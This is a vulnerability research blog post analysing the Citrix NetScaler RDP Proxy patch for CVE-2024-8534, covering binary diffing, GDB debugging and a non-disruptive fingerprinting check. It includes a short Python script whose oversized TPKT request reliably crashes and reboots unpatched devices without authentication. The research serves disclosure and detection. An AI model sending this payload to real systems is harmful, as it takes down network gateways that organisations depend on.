It’s been a little while since we last looked at Citrix NetScaler. We’re back this time to look at a patch for yet another memory safety vulnerability. In mid-November this year Citrix released a security bulletin for CVE-2024-8534. The issue appears to exist in the “RDP Proxy” feature and the notes from Citrix mention a denial of service and memory corruption, but not necessarily remote code execution.
Our goal was to reverse the patch and develop a check for our Attack Surface Management platform. However, we also wanted to see if the memory corruption could lead to anything more serious than just denial of service. We were able to confirm the denial of service and track down the fix. However, we were unable to confirm remote code execution. As it stands, running an unpatched Citrix NetScaler with the RDP Proxy feature enabled allows an unauthenticated attacker to remotely force a system restart, leading to a denial of service.
What is RDP Proxy?
For those who are new to Citrix NetScaler, it is a network device providing a number of services such as load balancing, HTTP inspection and remote access VPN. The VPN component is also sometimes referred to on its own as just Citrix Gateway, which can cause some confusion.
For this vulnerability, we are looking at the RDP Proxy feature. RDP Proxy is disabled by default but when it is enabled the feature is used in conjunction with either the VPN or Auth Server services. RDP Proxy allows clients to connect to an RDP server farm through Citrix NetScaler. This gives a little more control over how RDP is authenticated and also avoids requiring a full VPN tunnel to connect with RDP.
The feature works by allowing the user to log in to the Citrix Gateway portal and download an RDP connection file containing a session token. When the user opens this RDP file their RDP client will establish an RDP connection to the NetScaler device using the session token to authenticate. NetScaler will then look up the target RDP server associated with the token and proxy the connection.
Finding the RDP Handler
To see what was patched, we set up two versions of NetScaler, 54.29 (unpatched) and 55.34 (patched). We then copied off the /netscaler/nsppe binary. This is the NetScaler Packet Processing Engine and it contains a full TCP/IP network stack as well as multiple HTTP services. Nearly all the functionality we care about auditing is typically found here.
We decompiled each version with Ghidra and used the BinExport plugin to generate BinDiff files. Unfortunately, we were greeted with hundreds of functions that were potentially different. Additionally, unlike previous versions of NetScaler, function names were now stripped from the binary. Diffing using this approach did not seem like the way forward.
Instead we decided to configure and use the RDP Proxy feature, hoping we could use some information from the requests that were sent to find where in the binary to look. We logged in as a test user and downloaded the RDP connection pack. When connecting with this pack we watched the /var/log/ns.log file and saw the following message.
Dec 10 04:52:02 <local0.err> 192.168.1.190 12/10/2024:04:52:02 GMT 0-PPE-0 : default RDP Message 151 0 : "[Remote ip = 192.168.1.197:65144][Username = test] Unable to resolve target info 192.168.1.197:3389 - Client:192.168.1.197:65144 - Local:192.168.1.196:443"
We searched for this message in the nsppe binary and found it in FUN_006c2e10.
uVar14 = FUN_01ffdce0(
lVar43,0x484,
"[Remote ip = %s:%u][Username = %.*s] Unable to resolve target info %.*s:%d - Client:%s:%d - Local:%s:%d",
uVar20,uVar14 << 8 | uVar14 >> 8,cVar35,local_300,
uVar23,lVar44,uVar15 << 8 | uVar15 >> 8,uVar21,
uVar16 << 8 | uVar16 >> 8,uVar22,
*(ushort *)((long)param_2 + 10) << 8 |
*(ushort *)((long)param_2 + 10) >> 8
);
We also found the message in an old decompilation from our previous research that did not strip the function names. We were able to match up the two functions and confirmed that FUN_006c2e10 was the appropriately titled nsaaa_rdp_handler.
We used the old decompilation to fill in function names as we searched backwards from the call sites for nsaaa_rdp_handler. We found the following snippet in nsssl_handler. This function called ns_sslvpn_check_rdpconnect which then called nsaaa_rdp_handler.
cVar1 = **(char **)(param_1 + 0xe8);
if ((-1 < cVar1) && (cVar1 != '\x16')) {
if ((cVar1 == '\x03') && (iVar5 = FUN_006d20b0_ns_sslvpn_check_rdpconnect(param_1,param_2), iVar5 == 0)) {
return 0;
}
_DAT_03162e18 = _DAT_03162e18 + 1;
FUN_0208c230(*(undefined8 *)(param_1 + 0x90),0);
FUN_01bb9950(param_1,0x420);
return 0;
}
Here we found that the RDP handling routines are only invoked if the first byte of the request is \x03. This is the first byte of an RDP packet (the TPKT version field) and explained how NetScaler switched between RDP and HTTP on the same port. If the RDP Proxy feature is disabled, requests starting with this byte are immediately dropped and the connection is reset.
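The branch above can be modelled in a few lines of Python. This is only a sketch of how the decompiled snippet reads, not NetScaler's actual logic: the function name and the return labels are made up for illustration, the rdp_proxy_enabled flag stands in for whatever ns_sslvpn_check_rdpconnect checks internally, and the path taken for 0x16 or for bytes with the high bit set is assumed to be the regular SSL handling, since the snippet does not show it.

```python
def classify_first_byte(first: int, rdp_proxy_enabled: bool) -> str:
    """Hypothetical model of the first-byte dispatch seen in nsssl_handler."""
    if not 0 <= first <= 0xFF:
        raise ValueError("expected a single byte value")
    # The decompiled code reads the byte as a signed char, so values with
    # the high bit set are negative and fail the (-1 < cVar1) test.
    signed = first - 0x100 if first >= 0x80 else first
    if signed < 0 or first == 0x16:
        # 0x16 is the TLS handshake record type. Assumption: these bytes
        # continue into the SSL processing that the snippet does not show.
        return "ssl"
    if first == 0x03 and rdp_proxy_enabled:
        # Assumption: the RDP check only returns 0 (handled) when the
        # RDP Proxy feature is enabled.
        return "rdp"
    # Everything else: counter incremented and the connection reset.
    return "drop"


for b in (0x03, 0x16, 0x80, ord("G")):
    print(hex(b), classify_first_byte(b, True), classify_first_byte(b, False))
```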
Triggering a Crash
We used Wireshark and these three protocol documents to write a short Python script that we could use to send RDP Connection Requests and manually tweak some of the parameters.
#!/usr/bin/env python3
import socket
x224Crq = b"^\xe0\x00\x00\x00\x00\x00"
cookie = b"Cookie: mstshash=IDENTIFIER\r\n"
rdpNegotiateRequest = b"\x01\x02\x08\x00\x00\x00\x00\x00"
payload = x224Crq + cookie + rdpNegotiateRequest
tpktHeader = b"\x03\x00" + (len(payload)+4).to_bytes(2, 'big')
req = tpktHeader + payload
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.196", 443))
sock.sendall(req)
print(sock.recv(1024))
We found that NetScaler ignored nearly all the fields except the request length which it would use to determine if it needed to read more data and either a cookie or a “STA Ticket” that it would use for authentication. The rest of the request did not need to conform to the protocol as it did not appear to be parsed at all.
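For readers unfamiliar with the TPKT header, the sketch below shows how a receiver can use the length field to decide whether more data is needed. It follows the standard four-byte TPKT layout (version, reserved, big-endian length that includes the header); the helper names are our own and this is not a reconstruction of NetScaler's parser.

```python
import struct

TPKT_HEADER_LEN = 4


def parse_tpkt_header(data: bytes) -> tuple[int, int]:
    """Return (version, total_length) from the first four bytes of a TPKT."""
    if len(data) < TPKT_HEADER_LEN:
        raise ValueError("need at least 4 bytes for a TPKT header")
    # version (1 byte), reserved (1 byte), length (2 bytes, big endian)
    version, _reserved, length = struct.unpack(">BBH", data[:TPKT_HEADER_LEN])
    return version, length


def bytes_still_needed(buffer: bytes) -> int:
    """How many more bytes the header claims are still to come."""
    _version, length = parse_tpkt_header(buffer)
    return max(0, length - len(buffer))


payload = b"A" * 4000
req = b"\x03\x00" + (len(payload) + 4).to_bytes(2, "big") + payload
print(parse_tpkt_header(req))         # (3, 4004)
print(bytes_still_needed(req[:100]))  # 3904
```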
We found two cookies mentioned in the RDP specification. One is a field labeled “cookie” and it looks like an HTTP header, Cookie: mstshash=username. The other is unhelpfully labeled “routingToken”, but is very similar, for example: Cookie: msts=3640205228.15629.0000. We found that NetScaler only searched for the “routingToken” version of this field. While we tried different values and lengths for this line, we found they were all handled without issue.
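A rough sketch of how such variations can be generated is shown below. It reuses the byte strings from the script above unchanged and swaps in the “routingToken” style cookie; the helper names and the particular lengths tried are illustrative choices, not the exact values used during testing.

```python
# Byte strings copied verbatim from the connection request script above.
X224_CRQ = b"^\xe0\x00\x00\x00\x00\x00"
RDP_NEG_REQ = b"\x01\x02\x08\x00\x00\x00\x00\x00"


def build_request(cookie_value: bytes) -> bytes:
    """Wrap a routingToken-style cookie in a TPKT-framed connection request."""
    cookie = b"Cookie: msts=" + cookie_value + b"\r\n"
    payload = X224_CRQ + cookie + RDP_NEG_REQ
    # The TPKT length covers the 4-byte header as well as the payload.
    return b"\x03\x00" + (len(payload) + 4).to_bytes(2, "big") + payload


def cookie_variants():
    """Yield a well-formed token followed by values of assorted lengths."""
    yield b"3640205228.15629.0000"
    for n in (0, 1, 64, 512, 4096):
        yield b"A" * n


for value in cookie_variants():
    req = build_request(value)
    print(len(value), len(req), req[:4].hex())
```

Each request can then be sent with the same socket code as the original script.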
The other field was a “STA Ticket”. This appeared to be for a custom Citrix service called the “Secure Ticket Authority”. We looked online and found some examples of the ticket and it appeared to be a semicolon-delimited string, for example: ;10;STA01;FE0A7B2CE2E77DDC17C7FD3EE7959E79. Again, we fuzzed this field but any errors in the format were always handled gracefully.
We moved on to fuzzing the packet header, sending very large requests, multiple requests in the same connection and repeated requests in quick succession. We did eventually get a crash which we then shrunk down to the following (perhaps underwhelming) payload:
#!/usr/bin/env python3
import socket
payload = b"A"*4000
tpktHeader = b"\x03\x00" + (len(payload)+4).to_bytes(2, 'big')
req = tpktHeader + payload
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.196", 443))
sock.sendall(req)
print(sock.recv(1024))
In the end, the simplest payload was all we really needed. However, fuzzing the cookies and tickets still gave us a good idea of how the RDP Proxy feature worked and what NetScaler was doing to process these packets. Next we had to inspect the crash and see if we could determine where the memory corruption was occurring.
Setting Up a Debugger
Debugging NetScaler has always been non-trivial. As nsppe is responsible for the network stack we cannot debug it over SSH because pausing execution will pause packet processing and halt the SSH session. Since we ran NetScaler in a VM we were limited to the VMware console window. This was a less than brilliant experience, with the lack of scrolling and copy / paste being the two biggest issues.
Previously we used remote GDB over a serial port. However, this time we encountered issues. We suspect there was a mismatch between the protocol our GDB client was using and the one the server was sending. This happened last time too, but was solved by compiling a matching version of GDB. For whatever reason, that approach did not work this time. So instead of dealing with the frustrations of remote GDB, we decided to fix the console experience.
We started by adding a serial port like the one used for remote GDB. This was done by adding the following snippet to the vmx file of our VM. This would map a serial port inside the VM to TCP port 12345 on our host machine.
serial0.fileType = "network"
serial0.fileName = "telnet://:12345"
serial0.present = "TRUE"
Inside NetScaler, via the VMware console, we ran the following command to set up a new tty on that serial port, /dev/cuau0.
root@ns# getty xterm cuau0
We could then connect with telnet and get the normal shell experience but in our own terminal. This meant we would have full access to scroll back and copy / paste.
$ telnet localhost 12345
Trying ::1...
Connected to localhost.
Escape character is '^]'.
��root�
Password:
Done
> shell
root@ns#
To properly debug nsppe, we had to first stop the pitboss service. This program periodically checks in with nsppe and if it doesn’t get a response, nsppe is restarted. Since we don’t want our program to restart while paused in the debugger, we suspended pitboss by attaching GDB and leaving it in the background.
root@ns# ps aux | grep pitboss
root 27 0.0 0.8 13528 13628 - S 05:56 0:00.11 nspitboss (pitboss)
root@ns# gdb -p 27 &
[1] 2598
...
[1]+ Stopped gdb -p 27
root@ns#
We could then attach GDB to nsppe and inspect the crash.
root@ns# ps aux | grep nsppe
root 1551 100.0 42.1 711104 699712 - Rs 05:58 13:52.93 nsppe (NSPPE-00)
root@ns# gdb -p 1551
...
Attaching to process 1551
Reading symbols from /netscaler/nsppe...
(No debugging symbols found in /netscaler/nsppe)
[Switching to LWP 100192 of process 1551]
0x000000000206bf16 in ?? ()
(gdb) c
Continuing.
Program received signal SIGBUS, Bus error.
0x0000000001dd8a6d in ?? ()
Debugging the Crash
Determining the root cause of the crash was a difficult task. Each crash forced the VM to reboot, which took roughly thirty seconds and made it slow to iterate through possible causes. The crash was always a bad pointer dereference and would sometimes, but not always, occur within nsaaa_rdp_handler. If we look at the crash from the previous section we can see nsaaa_rdp_handler still in the call stack.
Program received signal SIGBUS, Bus error.
0x0000000001dd8a6d in ?? ()
(gdb) bt
#0 0x0000000001dd8a6d in ?? ()
#1 0x000000000145fdcc in ?? ()
#2 0x00000000013b1e3a in ?? ()
#3 0x00000000013bfc6d in ?? ()
#4 0x00000000013afd76 in ?? ()
#5 0x00000000006c9519 in ?? () <- nsaaa_rdp_handler
#6 0x0000000002085a8f in ?? ()
#7 0x00000000016fca87 in ?? ()
#8 0x0000000002087717 in ?? ()
#9 0x00000000020762ba in ?? ()
#10 0x0000000002073281 in ?? ()
#11 0x000000000206c4bc in ?? ()
#12 0x000000000206c259 in ?? ()
#13 0x000000000170cd2f in ?? ()
#14 0x000000000170cbc2 in ?? ()
#15 0x0000000001baa662 in ?? ()
#16 0x0000000001ba9c9d in ?? ()
#17 0x000000000040039b in ?? ()
#18 0x0000000000000000 in ?? ()
Looking at the registers we saw part of our payload had found its way into rax and the write to this location in memory caused a fault.
(gdb) x/i $rip
=> 0x1dd8a6d: mov QWORD PTR [rax],rcx
(gdb) x/i $rax
0x414141414141416b: Cannot access memory at address 0x414141414141416b
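To make the link between the faulting address and the payload explicit, the value of rax can be decoded byte by byte. The short sketch below only restates what the register shows: seven of the eight bytes are 0x41 ("A") and the lowest byte is 0x6b. Whether that low byte reflects an offset added to a pointer made of payload bytes, or something else entirely, is a guess on our part and was not confirmed.

```python
rax = 0x414141414141416B

# x86-64 is little endian, so the lowest byte of the register is the first
# byte in memory order.
raw = rax.to_bytes(8, "little")
print(raw)  # b'kAAAAAAA'

# Count how many bytes of the pointer match the payload filler byte.
filler = ord("A")
matching = sum(1 for byte in raw if byte == filler)
print(matching, "of 8 bytes are 0x41")

# Difference between the faulting address and a pointer made only of "A"s.
offset = rax - int.from_bytes(b"A" * 8, "little")
print(hex(offset))  # 0x2a
```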
The example above is just one of many locations where the fault occurred. It was random at which location the execution would halt and there was a lot of code to step through between the initial request processing and the crash. In an attempt to narrow down our search, we took another look at a text diff between the patched and unpatched nsaaa_rdp_handler. A lot of the code had been rearranged, but was functionally the same. However, we were able to identify a small check added to ensure a variable was no greater than 512.
// unpatched
uVar14 = *(ushort *)(*(char **)(param_1 + 0xe8) + 2); // take two bytes from param_1
uVar14 = uVar14 << 8 | uVar14 >> 8; // swap the two bytes
param_2[0xbc] = (uint)uVar14; // save value to param_2
puVar41 = *(undefined4 **)(param_2 + 0x11e);
if (*(ushort *)(param_1 + 0xf2) < uVar14) {
// patched
uVar14 = *(ushort *)(*(char **)(param_1 + 0xe8) + 2); // take two bytes from param_1
uVar14 = uVar14 << 8 | uVar14 >> 8; // swap the two bytes
param_2[0xbc] = (uint)uVar14; // save value to param_2
if (0x200 < uVar14) { // if value is greater than 512, jump to cleanup
_DAT_036cfe40 = _DAT_036cfe40 + 1;
FUN_009d6770(param_2,0x11f);
goto LAB_006c67d2;
}
puVar41 = *(undefined4 **)(param_2 + 0x11e);
if (*(ushort *)(param_1 + 0xf2) < uVar14) {
The two byte swap was conspicuous because the request header had a two byte length field in big endian order that would need byte swapping. We set a breakpoint at this location and saw that the variable contained the length of our request.
(gdb) b *0x006c38ae
Breakpoint 1 at 0x6c38ae
(gdb) c
Continuing.
Breakpoint 1, 0x00000000006c38ae in ?? ()
(gdb) print $ecx
$1 = 4004 // our 4000 byte payload + 4 byte header
(gdb)
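The arithmetic behind that value can be checked by hand. The sketch below mirrors the decompiled byte swap on the length bytes of our 4004-byte request and applies the bound from the patched code. The function names are ours, and patched_accepts models only the single added comparison, not the rest of the handler.

```python
def swap16(value: int) -> int:
    """Swap the two bytes of a 16-bit value, as the decompiled code does."""
    return ((value << 8) | (value >> 8)) & 0xFFFF


def patched_accepts(length: int) -> bool:
    """Model of the added check: lengths above 0x200 jump to cleanup."""
    return length <= 0x200


wire = (4000 + 4).to_bytes(2, "big")      # length bytes as sent: 0f a4
as_read = int.from_bytes(wire, "little")  # little-endian load: 0xa40f
length = swap16(as_read)                  # back to host order: 4004

print(wire.hex(), hex(as_read), length)
print(patched_accepts(length))  # False
print(patched_accepts(512))     # True
```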
It seemed likely that this was how the issue was patched. However, this check didn’t provide much help tracking down where the memory corruption occurred as there was still a lot of processing done after where this check would have been in the unpatched version.
Out of Time
Unfortunately, this was also where we ran out of time to continue digging. The advisory from Citrix stated that this was a denial of service and memory corruption and that appears consistent with our findings. The corrupted memory always appeared in a dynamically allocated block and not the call stack. This means that if code execution was possible, it is unlikely to be trivial. None of the crashes we investigated had an immediately obvious path to code execution; however, we weren’t able to verify all code paths back from the crash. We were also unable to determine at what point too much memory was read or written based on the request length.
What Did We Learn?
It’s a bit disappointing that we were unable to track down an exact root cause for this vulnerability, but sometimes that’s the case. Fortunately, we were able to uncover a bit more about how NetScaler is configured and how it operates, and to set up some good debugging tooling for the next time one of these issues appears.
Along the way we were able to reliably fingerprint if a host had the RDP Proxy feature enabled. We did this by sending RDP negotiate packets and monitoring the response. If RDP Proxy was enabled and a request was sent specifying a length longer than what was provided, the connection would wait for the rest of the packet, indicating RDP was being processed. If RDP Proxy was disabled, the connection would be terminated immediately. By combining this with a version check we were able to provide our customers with a good indicator of whether or not they may be exposed to the denial of service without causing any actual service disruption.
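A minimal sketch of that idea follows. It is not the check that ships in the platform: the function names, the claimed length, the timeout and the result labels are all assumptions made for illustration. It sends a TPKT header that claims more bytes than are actually sent and then watches whether the peer keeps waiting or drops the connection.

```python
import socket


def build_truncated_tpkt(claimed_len: int = 64, sent: bytes = b"\x00" * 8) -> bytes:
    """TPKT header claiming more data than is actually sent after it."""
    return b"\x03\x00" + claimed_len.to_bytes(2, "big") + sent


def classify_response(sock: socket.socket, probe: bytes, timeout: float) -> str:
    """Send the probe and report how the peer reacts."""
    sock.settimeout(timeout)
    try:
        sock.sendall(probe)
        data = sock.recv(1024)
    except socket.timeout:
        return "waiting"  # peer is holding out for the rest of the packet
    except ConnectionError:
        return "closed"   # reset or broken pipe
    return "closed" if not data else "responded"


def probe_rdp_proxy(host: str, port: int = 443, timeout: float = 3.0) -> str:
    # Connection errors are left to propagate so they are not mistaken
    # for a result.
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return classify_response(sock, build_truncated_tpkt(), timeout)
```

Calling probe_rdp_proxy("192.168.1.196") against the lab device from earlier would be expected to return "waiting" with RDP Proxy enabled and "closed" with it disabled. A timeout can have other causes, such as packet filtering, which is one reason the result is combined with a version check.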
As a part of our True Attack Surface Management platform, our Security Researchers designed a comprehensive check for this issue without causing disruption while maintaining high accuracy. This check provided our customers with the ability to rapidly respond to this vulnerability across their Citrix NetScaler assets.
As always, customers of our Attack Surface Management platform have been notified of the presence of this vulnerability. We continue to perform original security research in an effort to inform our customers about zero-day and N-day vulnerabilities in their attack surface.